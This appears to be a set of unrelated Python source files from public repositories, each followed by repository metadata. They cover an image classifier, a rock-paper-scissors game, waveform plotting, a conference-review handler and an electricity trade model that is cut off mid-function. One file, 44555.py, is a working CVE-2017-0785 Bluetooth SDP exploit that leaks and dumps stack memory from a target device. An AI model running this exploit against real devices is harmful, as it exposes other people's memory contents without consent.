import matplotlib.pyplot as plt
import numpy as np
import os
#basic cnn
# Initialising the CNN
classifier = Sequential()
# Step 1 - Convolution
classifier.add(Conv2D(32, (3, 3), input_shape = (128, 128, 3), activation = 'relu'))
# Step 2 - Pooling
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Adding a second convolutional layer
classifier.add(Conv2D(32, (3, 3), activation = 'relu'))
classifier.add(MaxPooling2D(pool_size = (2, 2)))
# Step 3 - Flattening
classifier.add(Flatten())
# Step 4 - Full connection
classifier.add(Dense(units = 128, activation = 'relu'))
classifier.add(Dense(units = 10, activation = 'sigmoid'))
# Compiling the CNN
classifier.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])
train_datagen = ImageDataGenerator(rescale = 1./255, shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory("C:\\Users\\navee\\OneDrive\\Desktop\\EP DETAILS\\Plant-Leaf-Disease-Prediction-main\\Dataset\\train", # relative path from working directoy
target_size = (128, 128),
batch_size = 6, class_mode = 'categorical')
valid_set = test_datagen.flow_from_directory("C:\\Users\\navee\\OneDrive\\Desktop\\EP DETAILS\\Plant-Leaf-Disease-Prediction-main\\Dataset\\val", # relative path from working directoy
target_size = (128, 128),
batch_size = 3, class_mode = 'categorical')
labels = (training_set.class_indices)
print(labels)
classifier.fit_generator(training_set,
steps_per_epoch = 20,
epochs = 50,
validation_data=valid_set
)
classifier_json=classifier.to_json()
with open("model1.json", "w") as json_file:
json_file.write(classifier_json)
# serialize weights to HDF5
classifier.save_weights("my_model_weights.h5")
classifier.save("model.h5")
print("Saved model to disk")
'''
import cv2
from matplotlib import pyplot as plt
import os
import numpy as np
img = cv2.imread("C:\\Users\\navee\\OneDrive\\Desktop\\EP DETAILS\\Plant-Leaf-Disease-Prediction-main\\Dataset\\test\\Tomato___Leaf_Mold (1).JPG")
img_resize = cv2.resize(img, (128,128))
CV2 reads an image in BGR format. We need to convert it to RGB
b,g,r = cv2.split(img_resize) # get b,g,r
rgb_img = cv2.merge([r,g,b]) # switch it to rgb
plt.imshow(rgb_img)
label_map = (training_set.class_indices)
print(label_map)
img_rank4 = np.expand_dims(rgb_img/255, axis=0)
classifier.predict(img_rank4)
h = list(label_map.keys())[classifier.predict_classes(img_rank4)[0]]
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(img, h, (10, 30), font, 1.0, (0, 0, 255), 1)
cv2.imshow(h,img)
print(h)
'''
| 33.538462
| 189
| 0.696674
|
4a0f2a2ac835550fa12181e5b660f5a249319269
| 1,859
|
py
|
Python
|
bot_rps.py
|
yunastrian/bot-rps-game
|
c29c6d88b086dd18be51d6a0bb38c2aa6190134b
|
[
"MIT"
] | 5
|
2021-03-21T15:18:39.000Z
|
2021-04-30T16:48:10.000Z
|
bot_rps.py
|
yunastrian/bot-rps-game
|
c29c6d88b086dd18be51d6a0bb38c2aa6190134b
|
[
"MIT"
] | 3
|
2021-03-21T17:42:07.000Z
|
2021-03-31T07:12:18.000Z
|
bot_rps.py
|
yunastrian/bot-rps-game
|
c29c6d88b086dd18be51d6a0bb38c2aa6190134b
|
[
"MIT"
] | 3
|
2021-03-21T16:12:25.000Z
|
2021-03-31T06:13:42.000Z
|
import getopt
import sys
from typing import Dict
import yaml
moves_lang2en: Dict = dict()
moves_en2lang: Dict = dict()
# default value
variables_filename = 'variables.yml'
lang = 'en'
variables_file = open(variables_filename, 'r')
variable_dict: Dict = yaml.safe_load(variables_file)
variables_file.close()
supported_languages = variable_dict.keys()
argv = sys.argv[1:]
usage_message = (f"Usage: python {__file__} [OPTIONS]\n"
"\n"
"Options:\n"
"-l, --language Select the language of the game.\n"
" The default is english.\n")
try:
opts, args = getopt.getopt(argv, "hl:",
["help", "language ="])
except Exception:
print('Invalid option\n')
print(usage_message)
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print(usage_message)
sys.exit()
elif opt in ("-l", "--language"):
if arg not in supported_languages:
print(f"Invalid arguments for language: {arg}")
print(f'Supported languages: {", ".join(supported_languages)}')
sys.exit(3)
lang = arg
variables: Dict = variable_dict[lang]
for en, lang in variables['moves'].items():
moves_en2lang[en] = lang
moves_lang2en[lang] = en
player_move = ''
while player_move not in moves_lang2en:
input_message = variables['messages']['input'] \
.format(moves=", ".join(moves_lang2en.keys()))
player_move = input(input_message).lower().strip()
player_move = moves_lang2en[player_move]
bot_move = 'rock'
if (player_move == 'paper'):
bot_move = 'scissor'
elif (player_move == 'rock'):
bot_move = 'paper'
bot_move = moves_en2lang[bot_move]
print()
print(variables['messages']['bot_pick'].format(bot_move=bot_move))
print(variables['messages']['defeat'])
| 27.338235
| 75
| 0.628295
|
4a0f2aa074555df2c9c89b630235e449be0fddfc
| 1,226
|
py
|
Python
|
examples/ifft/ex_phpv3.py
|
LBJ-Wade/phenom
|
8f0fdc14099dac09cb2eef36d825e577340a8421
|
[
"MIT"
] | null | null | null |
examples/ifft/ex_phpv3.py
|
LBJ-Wade/phenom
|
8f0fdc14099dac09cb2eef36d825e577340a8421
|
[
"MIT"
] | null | null | null |
examples/ifft/ex_phpv3.py
|
LBJ-Wade/phenom
|
8f0fdc14099dac09cb2eef36d825e577340a8421
|
[
"MIT"
] | null | null | null |
import phenom
import matplotlib
# matplotlib.use('MacOSX')
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from phenom.utils.utils import Constants, HztoMf
import phenom
m1 = 35.
m2 = 30.
chi1x = 0.9
chi1y = 0.
chi1z = 0.
chi2x = 0.
chi2y = 0.
chi2z = 0.
delta_f = 1./8.
f_min = 30.
fRef = f_min
inclination = np.pi/3.
phenompv3 = phenom.Waveform(approximant="IMRPhenomPv3")
from copy import copy
phenpv3_1 = copy(phenompv3)
phenpv3_1.input_params['m1']=m1
phenpv3_1.input_params['m2']=m2
phenpv3_1.input_params['chi1x']=chi1x
phenpv3_1.input_params['chi1y']=chi1y
phenpv3_1.input_params['chi1z']=chi1z
phenpv3_1.input_params['chi2x']=chi2x
phenpv3_1.input_params['chi2y']=chi2y
phenpv3_1.input_params['chi2z']=chi2z
phenpv3_1.input_params['inclination']=inclination
phenpv3_1.input_params['f_min']=f_min
phenpv3_1.input_params['fRef']=fRef
phenpv3_1.input_params['delta_f']=delta_f
print("starting phenompv3 generator")
#phenomp_v3 waveform generator
phenpv3_1.phenompv3(phenpv3_1.input_params)
plt.figure()
plt.plot(phenpv3_1.flist_Hz, np.absolute(phenpv3_1.hptilde), label='phenom.v3')
plt.xscale('log')
plt.yscale('log')
plt.legend(loc='best')
plt.savefig('./FD_amplitude_phenpv3.png')
| 21.892857
| 79
| 0.771615
|
4a0f2ab81b084e9a134f01f2f4557ab624188c8b
| 389
|
py
|
Python
|
Codes/pgportfolio/nnagent/rollingtrainer.py
|
Reself-C/COMAP-MCM-ICM-2022
|
30fe1de5b58de99878bc1358662f3ae7d7689b20
|
[
"MIT"
] | 1
|
2022-03-13T20:15:41.000Z
|
2022-03-13T20:15:41.000Z
|
Codes/pgportfolio/nnagent/rollingtrainer.py
|
Reself-C/COMAP-MCM-ICM-2022
|
30fe1de5b58de99878bc1358662f3ae7d7689b20
|
[
"MIT"
] | null | null | null |
Codes/pgportfolio/nnagent/rollingtrainer.py
|
Reself-C/COMAP-MCM-ICM-2022
|
30fe1de5b58de99878bc1358662f3ae7d7689b20
|
[
"MIT"
] | 1
|
2022-03-04T16:07:51.000Z
|
2022-03-04T16:07:51.000Z
|
from pgportfolio.nnagent.tradertrainer import TraderTrainer
class RollingTrainer(TraderTrainer):
def __init__(self, config, **kwargs):
config = config.copy()
config["training"]["buffer_biased"] = config["trading"]["buffer_biased"]
config["training"]["learning_rate"] = config["trading"]["learning_rate"]
TraderTrainer.__init__(self, config, **kwargs)
| 38.9
| 80
| 0.699229
|
4a0f2b992475d900716dc5633e891c46b7566a82
| 1,262
|
py
|
Python
|
subreview_lib/subsassignmentpage.py
|
allankellynet/mimas
|
10025d43bba9e84f502a266760786842e7158a05
|
[
"MIT"
] | null | null | null |
subreview_lib/subsassignmentpage.py
|
allankellynet/mimas
|
10025d43bba9e84f502a266760786842e7158a05
|
[
"MIT"
] | 1
|
2020-02-05T13:00:29.000Z
|
2020-02-05T13:00:29.000Z
|
subreview_lib/subsassignmentpage.py
|
allankellynet/mimas
|
10025d43bba9e84f502a266760786842e7158a05
|
[
"MIT"
] | null | null | null |
#-----------------------------------------------------
# Mimas: conference submission and review system
# (c) Allan Kelly 2016-2020 http://www.allankelly.net
# Licensed under MIT License, see LICENSE file
# -----------------------------------------------------
# System imports
# Google imports
# Local imports
import basehandler
from submission_lib import submissionrecord, voterecord
from subreview_lib import reviewer
class SubmissionAssignmentsPage(basehandler.BaseHandler):
def get(self):
conference = self.get_crrt_conference_key().get()
review_round = int(self.request.get("round", "1"))
submissions = submissionrecord.retrieve_conference_submissions(conference.key)
submission_keys = map(lambda s: s.key, submissions)
template_values = {
"submissions": submissions,
"assignment_count": dict(reviewer.count_submission_reviewers(submission_keys, review_round)),
"tracks": conference.track_options(),
"vote_count": voterecord.count_votes_for_submissions(submission_keys, review_round),
"crrt_conf": conference,
"review_round": review_round,
}
self.write_page('subreview_lib/subsassignmentpage.html', template_values)
| 36.057143
| 105
| 0.656101
|
4a0f2c088ad2cfeca82aedd9e45cf77f1967209a
| 1,129
|
py
|
Python
|
remote/44555.py
|
malos17713/Android-Exploits
|
2736ece957f9174ba2f063ed34d66f8f58f65e95
|
[
"CC-BY-4.0"
] | 446
|
2018-08-21T09:33:28.000Z
|
2022-03-30T02:53:47.000Z
|
remote/44555.py
|
AngelsDemon/Android-Exploits
|
2736ece957f9174ba2f063ed34d66f8f58f65e95
|
[
"CC-BY-4.0"
] | null | null | null |
remote/44555.py
|
AngelsDemon/Android-Exploits
|
2736ece957f9174ba2f063ed34d66f8f58f65e95
|
[
"CC-BY-4.0"
] | 105
|
2018-08-21T09:33:40.000Z
|
2022-02-09T14:01:37.000Z
|
from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
exit()
target = args['TARGET']
service_long = 0x0100
service_short = 0x0001
mtu = 50
n = 30
def packet(service, continuation_state):
pkt = '\x02\x00\x00'
pkt += p16(7 + len(continuation_state))
pkt += '\x35\x03\x19'
pkt += p16(service)
pkt += '\x01\x00'
pkt += continuation_state
return pkt
p = log.progress('Exploit')
p.status('Creating L2CAP socket')
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, mtu)
context.endian = 'big'
p.status('Connecting to target')
sock.connect((target, 1))
p.status('Sending packet 0')
sock.send(packet(service_long, '\x00'))
data = sock.recv(mtu)
if data[-3] != '\x02':
log.error('Invalid continuation state received.')
stack = ''
for i in range(1, n):
p.status('Sending packet %d' % i)
sock.send(packet(service_short, data[-3:]))
data = sock.recv(mtu)
stack += data[9:-3]
sock.close()
p.success('Done')
print hexdump(stack)
| 21.711538
| 65
| 0.635075
|
4a0f2c0a6b7c6f3af60e7b6bb1cbca539e4bb38f
| 31,740
|
py
|
Python
|
electricitylci/eia_io_trading.py
|
bl-young/ElectricityLCI
|
091be051a60c15f762b150dd0e2b7cfd6adbed1a
|
[
"CC0-1.0"
] | 17
|
2018-10-26T14:58:10.000Z
|
2022-02-01T00:17:27.000Z
|
electricitylci/eia_io_trading.py
|
hottleta/ElectricityLCI
|
45f292ed8ebcdf7acfe17ee609862fa072b75ea0
|
[
"CC0-1.0"
] | 129
|
2018-07-16T22:02:32.000Z
|
2022-03-16T19:11:35.000Z
|
electricitylci/eia_io_trading.py
|
hottleta/ElectricityLCI
|
45f292ed8ebcdf7acfe17ee609862fa072b75ea0
|
[
"CC0-1.0"
] | 8
|
2018-08-29T11:27:52.000Z
|
2021-03-05T06:36:22.000Z
|
import numpy as np
import os
import pandas as pd
# import eia
from datetime import datetime
import pytz
import json
from os.path import join
import zipfile
import requests
import logging
from electricitylci.globals import data_dir, output_dir
from electricitylci.bulk_eia_data import download_EBA, row_to_df, ba_exchange_to_df
from electricitylci.model_config import model_specs
import electricitylci.eia923_generation as eia923
import electricitylci.eia860_facilities as eia860
from electricitylci.process_dictionary_writer import *
"""
Merge generation and emissions data. Add region designations using either
eGRID or EIA-860. Same for primary fuel by plant (eGRID or 923). Calculate
and merge in the total generation by region. Create the column "Subregion"
to hold regional name info. Remove electricity flows. Rename flows and add
UUIDs according to the federal flow list.
Parameters
----------
year : int
Specified year to pull transaction data between balancing authorities
subregion : str
Description of a group of regions. Options include 'FERC' for all FERC
market regions, 'BA' for all balancing authorities.
Returns
-------
Dictionary of dataframes with import region, export region, transaction amount, total
imports for import region, and fraction of total. The dictionary keys
are the level of aggregation: "BA", "FERC", "US".
Sample output:
ferc_final_trade.head()
import ferc region export ferc region value total fraction
0 CAISO CAISO 2.662827e+08 3.225829e+08 0.825471
1 CAISO Canada 1.119572e+06 3.225829e+08 0.003471
2 CAISO ERCOT 0.000000e+00 3.225829e+08 0.000000
3 CAISO ISO-NE 0.000000e+00 3.225829e+08 0.000000
4 CAISO MISO 0.000000e+00 3.225829e+08 0.000000
"""
def ba_io_trading_model(year=None, subregion=None, regions_to_keep=None):
REGION_NAMES = [
'California', 'Carolinas', 'Central',
'Electric Reliability Council of Texas, Inc.', 'Florida',
'Mid-Atlantic', 'Midwest', 'New England ISO',
'New York Independent System Operator', 'Northwest', 'Southeast',
'Southwest', 'Tennessee Valley Authority'
]
REGION_ACRONYMS = [
'TVA', 'MIDA', 'CAL', 'CAR', 'CENT', 'ERCO', 'FLA',
'MIDW', 'ISNE', 'NYIS', 'NW', 'SE', 'SW',
]
if year is None:
year = model_specs.NETL_IO_trading_year
if subregion is None:
subregion = model_specs.regional_aggregation
if subregion not in ['BA', 'FERC','US']:
raise ValueError(
f'subregion or regional_aggregation must have a value of "BA" or "FERC" '
f'when calculating trading with input-output, not {subregion}'
)
# Read in BAA file which contains the names and abbreviations
df_BA = pd.read_excel(data_dir + '/BA_Codes_930.xlsx', sheet_name = 'US', header = 4)
df_BA.rename(columns={'etag ID': 'BA_Acronym', 'Entity Name': 'BA_Name','NCR_ID#': 'NRC_ID', 'Region': 'Region'}, inplace=True)
BA = pd.np.array(df_BA['BA_Acronym'])
US_BA_acronyms = df_BA['BA_Acronym'].tolist()
# Read in BAA file which contains the names and abbreviations
# Original df_BAA does not include the Canadian balancing authorities
# Import them here, then concatenate to make a single df_BAA_NA (North America)
df_BA_CA = pd.read_excel(data_dir + '/BA_Codes_930.xlsx', sheet_name = 'Canada', header = 4)
df_BA_CA.rename(columns={'etag ID': 'BA_Acronym', 'Entity Name': 'BA_Name','NCR_ID#': 'NRC_ID', 'Region': 'Region'}, inplace=True)
df_BA_NA = pd.concat([df_BA, df_BA_CA])
ferc_list = df_BA_NA['FERC_Region_Abbr'].unique().tolist()
# Read in the bulk data
# download_EBA()
path = join(data_dir, 'bulk_data', 'EBA.zip')
NET_GEN_ROWS = []
BA_TO_BA_ROWS = []
DEMAND_ROWS=[]
TOTAL_INTERCHANGE_ROWS=[]
try:
logging.info("Using existing bulk data download")
z = zipfile.ZipFile(path, 'r')
except FileNotFoundError:
logging.info("Downloading new bulk data")
download_EBA()
z = zipfile.ZipFile(path, 'r')
logging.info("Loading bulk data to json")
with z.open('EBA.txt') as f:
for line in f:
# All but one BA is currently reporting net generation in UTC and local time
# for that one BA (GRMA) only UTC time is reported - so only pulling that
# for now.
if b'EBA.NG.H' in line and b'EBA.NG.HL' not in line:
NET_GEN_ROWS.append(json.loads(line))
# Similarly there are 5 interchanges that report interchange in UTC but not in
# local time.
elif b'EBA.ID.H' in line and b'EBA.ID.HL' not in line:
exchange_line=json.loads(line)
if exchange_line['series_id'].split('-')[0][4:] not in REGION_ACRONYMS:
# try:
# Adding this check here to hopefully save some time down the road.
# dummy_date=datetime.strptime(exchange_line['data'][0][0],'%Y%m%dT%HZ')
BA_TO_BA_ROWS.append(exchange_line)
# good_date_count+=1
# except ValueError:
# bad_date_count+=1
# continue
# Keeping these here just in case
elif b'EBA.D.H' in line and b'EBA.D.HL' not in line:
DEMAND_ROWS.append(json.loads(line))
# elif b'EBA.TI.H' in line:
# TOTAL_INTERCHANGE_ROWS.append(json.loads(line))
logging.info(f"Net gen rows: {len(NET_GEN_ROWS)}; BA to BA rows:{len(BA_TO_BA_ROWS)}; Demand rows:{len(DEMAND_ROWS)}")
eia923_gen=eia923.build_generation_data(generation_years=[year])
eia860_df=eia860.eia860_balancing_authority(year)
eia860_df["Plant Id"]=eia860_df["Plant Id"].astype(int)
eia_combined_df=eia923_gen.merge(eia860_df,
left_on=["FacilityID"],
right_on=["Plant Id"],
how="left")
eia_gen_ba=eia_combined_df.groupby(by=["Balancing Authority Code"],as_index=False)["Electricity"].sum()
# Subset for specified eia_gen_year
start_datetime = '{}-01-01 00:00:00+00:00'.format(year)
end_datetime = '{}-12-31 23:00:00+00:00'.format(year)
start_datetime = datetime.strptime(start_datetime, '%Y-%m-%d %H:%M:%S%z')
end_datetime = datetime.strptime(end_datetime, '%Y-%m-%d %H:%M:%S%z')
# Net Generation Data Import
logging.info("Generating df with datetime")
df_net_gen = row_to_df(NET_GEN_ROWS, 'net_gen')
del(NET_GEN_ROWS)
logging.info("Pivoting")
df_net_gen = df_net_gen.pivot(index = 'datetime', columns = 'region', values = 'net_gen')
ba_cols = US_BA_acronyms
gen_cols = list(df_net_gen.columns.values)
gen_cols_set = set(gen_cols)
ba_ref_set = set(ba_cols)
col_diff = list(ba_ref_set - gen_cols_set)
col_diff.sort(key = str.upper)
logging.info("Cleaning net_gen dataframe")
# Add in missing columns, then sort in alphabetical order
for i in col_diff:
df_net_gen[i] = 0
# Keep only the columns that match the balancing authority names, there are several other columns included in the dataset
# that represent states (e.g., TEX, NY, FL) and other areas (US48)
df_net_gen = df_net_gen[ba_cols]
# Resort columns so the headers are in alpha order
df_net_gen = df_net_gen.sort_index(axis=1)
df_net_gen = df_net_gen.fillna(value = 0)
df_net_gen = df_net_gen.loc[start_datetime:end_datetime]
# Sum values in each column
df_net_gen_sum = df_net_gen.sum(axis = 0).to_frame()
logging.info("Reading canadian import data")
# Add Canadian import data to the net generation dataset, concatenate and put in alpha order
df_CA_Imports_Gen = pd.read_csv(data_dir + '/CA_Imports_Gen.csv', index_col = 0)
df_CA_Imports_Gen = df_CA_Imports_Gen[str(year)]
logging.info("Combining US and Canadian net gen data")
df_net_gen_sum = pd.concat([df_net_gen_sum,df_CA_Imports_Gen]).sum(axis=1)
df_net_gen_sum = df_net_gen_sum.to_frame()
df_net_gen_sum = df_net_gen_sum.sort_index(axis=0)
# Check the net generation of each Balancing Authority against EIA 923 data.
# If the percent change of a given area is greater than the mean absolute difference
# of all of the areas, it will be treated as an error and replaced with the
# value in EIA923.
logging.info("Checking against EIA 923 generation data")
net_gen_check=df_net_gen_sum.merge(
right=eia_gen_ba,
left_index=True,
right_on=["Balancing Authority Code"],
how="left"
).reset_index()
net_gen_check["diff"]=abs(net_gen_check["Electricity"]-net_gen_check[0])/net_gen_check[0]
diff_mad=net_gen_check["diff"].mad()
net_gen_swap=net_gen_check.loc[net_gen_check["diff"]>diff_mad,["Balancing Authority Code","Electricity"]].set_index("Balancing Authority Code")
df_net_gen_sum.loc[net_gen_swap.index,[0]]=np.nan
net_gen_swap.rename(columns={"Electricity":0},inplace=True)
df_net_gen_sum=df_net_gen_sum.combine_first(net_gen_swap)
# First work on the trading data from the 'df_trade_all_stack_2016' frame
# This cell does the following:
# 1. reformats the data to an annual basis
# 2. formats the BA names in the corresponding columns
# 3. evalutes the trade values from both BA perspectives
# (e.g. BA1 as exporter and importer in a transaction with BA2)
# 4. evaluates the trading data for any results that don't make sense
# a. both BAs designate as importers (negative value)
# b. both BAs designate as exporters (postive value)
# c. one of the BAs in the transation reports a zero value and the other is nonzero
# 5. calulate the percent difference in the transaction values reports by BAs
# 6. final exchange value based on logic;
# a. if percent diff is less than 20%, take mean,
# b. if not use the value as reported by the exporting BAA
# c. designate each BA in the transaction either as the importer or exporter
# Output is a pivot with index (rows) representing exporting BAs,
# columns representing importing BAs, and values for the traded amount
# Group and resample trading data so that it is on an annual basis
logging.info("Creating trading dataframe")
df_ba_trade = ba_exchange_to_df(BA_TO_BA_ROWS, data_type='ba_to_ba')
del(BA_TO_BA_ROWS)
df_ba_trade = df_ba_trade.set_index('datetime')
df_ba_trade['transacting regions'] = df_ba_trade['from_region'] + '-' + df_ba_trade['to_region']
logging.info("Filtering trading dataframe")
# Keep only the columns that match the balancing authority names, there are several other columns included in the dataset
# that represent states (e.g., TEX, NY, FL) and other areas (US48)
filt1 = df_ba_trade['from_region'].isin(ba_cols)
filt2 = df_ba_trade['to_region'].isin(ba_cols)
filt = filt1 & filt2
df_ba_trade = df_ba_trade[filt]
# Subset for eia_gen_year, need to pivot first because of non-unique datetime index
df_ba_trade_pivot = df_ba_trade.pivot(columns = 'transacting regions', values = 'ba_to_ba')
df_ba_trade_pivot = df_ba_trade_pivot.loc[start_datetime:end_datetime]
# Sum columns - represents the net transactced amount between the two BAs
df_ba_trade_sum = df_ba_trade_pivot.sum(axis = 0).to_frame()
df_ba_trade_sum = df_ba_trade_sum.reset_index()
df_ba_trade_sum.columns = ['BAAs','Exchange']
# Split BAA string into exporting and importing BAA columns
df_ba_trade_sum['BAA1'], df_ba_trade_sum['BAA2'] = df_ba_trade_sum['BAAs'].str.split('-', 1).str
df_ba_trade_sum = df_ba_trade_sum.rename(columns={'BAAs': 'Transacting BAAs'})
# Create two perspectives - import and export to use for comparison in selection of the final exchange value between the BAAs
df_trade_sum_1_2 = df_ba_trade_sum.groupby(['BAA1', 'BAA2','Transacting BAAs'], as_index=False)[['Exchange']].sum()
df_trade_sum_2_1 = df_ba_trade_sum.groupby(['BAA2', 'BAA1', 'Transacting BAAs'], as_index=False)[['Exchange']].sum()
df_trade_sum_1_2.columns = ['BAA1_1_2', 'BAA2_1_2','Transacting BAAs_1_2', 'Exchange_1_2']
df_trade_sum_2_1.columns = ['BAA2_2_1', 'BAA1_2_1','Transacting BAAs_2_1', 'Exchange_2_1']
# Combine two grouped tables for comparison for exchange values
df_concat_trade = pd.concat([df_trade_sum_1_2,df_trade_sum_2_1], axis = 1)
df_concat_trade['Exchange_1_2_abs'] = df_concat_trade['Exchange_1_2'].abs()
df_concat_trade['Exchange_2_1_abs'] = df_concat_trade['Exchange_2_1'].abs()
# Create new column to check if BAAs designate as either both exporters or both importers
# or if one of the entities in the transaction reports a zero value
# Drop combinations where any of these conditions are true, keep everything else
df_concat_trade['Status_Check'] = np.where(((df_concat_trade['Exchange_1_2'] > 0) & (df_concat_trade['Exchange_2_1'] > 0)) \
|((df_concat_trade['Exchange_1_2'] < 0) & (df_concat_trade['Exchange_2_1'] < 0)) \
| ((df_concat_trade['Exchange_1_2'] == 0) | (df_concat_trade['Exchange_2_1'] == 0)), 'drop', 'keep')
# Calculate the difference in exchange values
df_concat_trade['Delta'] = df_concat_trade['Exchange_1_2_abs'] - df_concat_trade['Exchange_2_1_abs']
# Calculate percent diff of exchange_abs values - this can be down two ways:
# relative to 1_2 exchange or relative to 2_1 exchange - perform the calc both ways
# and take the average
df_concat_trade['Percent_Diff_Avg']= ((abs((df_concat_trade['Exchange_1_2_abs']/df_concat_trade['Exchange_2_1_abs'])-1)) \
+ (abs((df_concat_trade['Exchange_2_1_abs']/df_concat_trade['Exchange_1_2_abs'])-1)))/2
# Mean exchange value
df_concat_trade['Exchange_mean'] = df_concat_trade[['Exchange_1_2_abs', 'Exchange_2_1_abs']].mean(axis=1)
# Percent diff equations creats NaN where both values are 0, fill with 0
df_concat_trade['Percent_Diff_Avg'].fillna(0, inplace = True)
# Final exchange value based on logic; if percent diff is less than 20%, take mean,
# if not use the value as reported by the exporting BAA. First figure out which BAA is the exporter
# by checking the value of the Exchance_1_2
# If that value is positive, it indicates that BAA1 is exported to BAA2; if negative, use the
# value from Exchange_2_1
df_concat_trade['Final_Exchange'] = np.where((df_concat_trade['Percent_Diff_Avg'].abs() < 0.2),
df_concat_trade['Exchange_mean'],np.where((df_concat_trade['Exchange_1_2'] > 0),
df_concat_trade['Exchange_1_2'],df_concat_trade['Exchange_2_1']))
# Assign final designation of BAA as exporter or importer based on logical assignment
df_concat_trade['Export_BAA'] = np.where((df_concat_trade['Exchange_1_2'] > 0), df_concat_trade['BAA1_1_2'],
np.where((df_concat_trade['Exchange_1_2'] < 0), df_concat_trade['BAA2_1_2'],''))
df_concat_trade['Import_BAA'] = np.where((df_concat_trade['Exchange_1_2'] < 0), df_concat_trade['BAA1_1_2'],
np.where((df_concat_trade['Exchange_1_2'] > 0), df_concat_trade['BAA2_1_2'],''))
df_concat_trade = df_concat_trade[df_concat_trade['Status_Check'] == 'keep']
# Create the final trading matrix; first grab the necessary columns, rename the columns and then pivot
df_concat_trade_subset = df_concat_trade[['Export_BAA', 'Import_BAA', 'Final_Exchange']]
df_concat_trade_subset.columns = ['Exporting_BAA', 'Importing_BAA', 'Amount']
df_trade_pivot = df_concat_trade_subset.pivot_table(index = 'Exporting_BAA', columns = 'Importing_BAA', values = 'Amount').fillna(0)
# This cell continues formatting the df_trade
# Find missing BAs - need to add them in so that we have a square matrix
# Not all BAs are involved in transactions
trade_cols = list(df_trade_pivot.columns.values)
trade_rows = list(df_trade_pivot.index.values)
trade_cols_set = set(trade_cols)
trade_rows_set = set(trade_rows)
trade_ba_ref_set = set(ba_cols)
trade_col_diff = list(trade_ba_ref_set - trade_cols_set)
trade_col_diff.sort(key = str.upper)
trade_row_diff = list(trade_ba_ref_set - trade_rows_set)
trade_row_diff.sort(key=str.upper)
# Add in missing columns, then sort in alphabetical order
for i in trade_col_diff:
df_trade_pivot[i] = 0
df_trade_pivot = df_trade_pivot.sort_index(axis=1)
# Add in missing rows, then sort in alphabetical order
for i in trade_row_diff:
df_trade_pivot.loc[i,:] = 0
df_trade_pivot = df_trade_pivot.sort_index(axis=0)
# Add Canadian Imports to the trading matrix
# CA imports are specified in an external file
df_CA_Imports_Cols = pd.read_csv(data_dir + '/CA_Imports_Cols.csv', index_col = 0)
df_CA_Imports_Rows = pd.read_csv(data_dir + '/CA_Imports_Rows.csv', index_col = 0)
df_CA_Imports_Rows = df_CA_Imports_Rows[['us_ba', str(year)]]
df_CA_Imports_Rows = df_CA_Imports_Rows.pivot(columns = 'us_ba', values = str(year))
df_concat_trade_CA = pd.concat([df_trade_pivot, df_CA_Imports_Rows])
df_concat_trade_CA = pd.concat([df_concat_trade_CA, df_CA_Imports_Cols], axis = 1)
df_concat_trade_CA.fillna(0, inplace = True)
df_trade_pivot = df_concat_trade_CA
df_trade_pivot = df_trade_pivot.sort_index(axis=0)
df_trade_pivot = df_trade_pivot.sort_index(axis=1)
# Perform trading calculations as provided in Qu et al (2018) to
# determine the composition of a BA consumption mix
# Create total inflow vector x and then convert to a diagonal matrix x-hat
logging.info("Inflow vector")
x = []
for i in range (len(df_net_gen_sum)):
x.append(df_net_gen_sum.iloc[i] + df_trade_pivot.sum(axis = 0).iloc[i])
x_np = np.array(x)
# If values are zero, x_hat matrix will be singular, set BAAs with 0 to small value (1)
df_x = pd.DataFrame(data = x_np, index = df_trade_pivot.index)
df_x = df_x.rename(columns = {0:'inflow'})
df_x.loc[df_x['inflow'] == 0] = 1
x_np = df_x.values
x_hat = np.diagflat(x_np)
# Create consumption vector c and then convert to a digaonal matrix c-hat
# Calculate c based on x and T
logging.info("consumption vector")
c = []
for i in range(len(df_net_gen_sum)):
c.append(x[i] - df_trade_pivot.sum(axis = 1).iloc[i])
c_np = np.array(c)
c_hat = np.diagflat(c_np)
# Convert df_trade_pivot to matrix
T = df_trade_pivot.values
# Create matrix to split T into distinct interconnections - i.e., prevent trading between eastern and western interconnects
# Connections between the western and eastern interconnects are through SWPP and WAUE
logging.info("Matrix operations")
interconnect = df_trade_pivot.copy()
interconnect[:] = 1
interconnect.loc['SWPP',['EPE', 'PNM', 'PSCO', 'WACM']] = 0
interconnect.loc['WAUE',['WAUW', 'WACM']] = 0
interconnect_mat = interconnect.values
T_split = np.multiply(T, interconnect_mat)
# Matrix trading math (see Qu et al. 2018 ES&T paper)
x_hat_inv = np.linalg.inv(x_hat)
B = np.matmul(T_split, x_hat_inv)
I = np.identity(len(df_net_gen_sum))
diff_I_B = I - B
G = np.linalg.inv(diff_I_B)
c_hat_x_hat_inv = np.matmul(c_hat, x_hat_inv)
G_c = np.matmul(G, c_hat)
H = np.matmul(G,c_hat, x_hat_inv)
df_G = pd.DataFrame(G)
df_B = pd.DataFrame(B)
df_H = pd.DataFrame(H)
# Convert H to pandas dataframe, populate index and columns
df_final_trade_out = df_H
df_final_trade_out.columns = df_net_gen_sum.index
df_final_trade_out.index = df_net_gen_sum.index
# Develop trading input for the eLCI code. Need to melt the dataframe to end up with a three column
# dataframe:Repeat for both possible aggregation levels - BA and FERC market region
# Establish a threshold of 0.00001 to be included in the final trading matrix
# Lots of really small values as a result of the matrix calculate (e.g., 2.0e-15)
df_final_trade_out_filt = df_final_trade_out.copy()
col_list = df_final_trade_out.columns.tolist()
#Adding in a filter for balancing authorities that are not associated
#with any specific plants in EIA860 - there won't be any data for them in
#the emissions dataframes. We'll set their quantities to 0 so that the
#consumption mixes are made up of the rest of the incoming balancing
#authority areas.
eia860_bas=sorted(
list(eia860_df["Balancing Authority Code"].dropna().unique())
+list(df_CA_Imports_Cols.columns)
)
keep_rows = [x for x in df_final_trade_out_filt.index if x in eia860_bas]
keep_cols = [x for x in df_final_trade_out_filt.columns if x in eia860_bas]
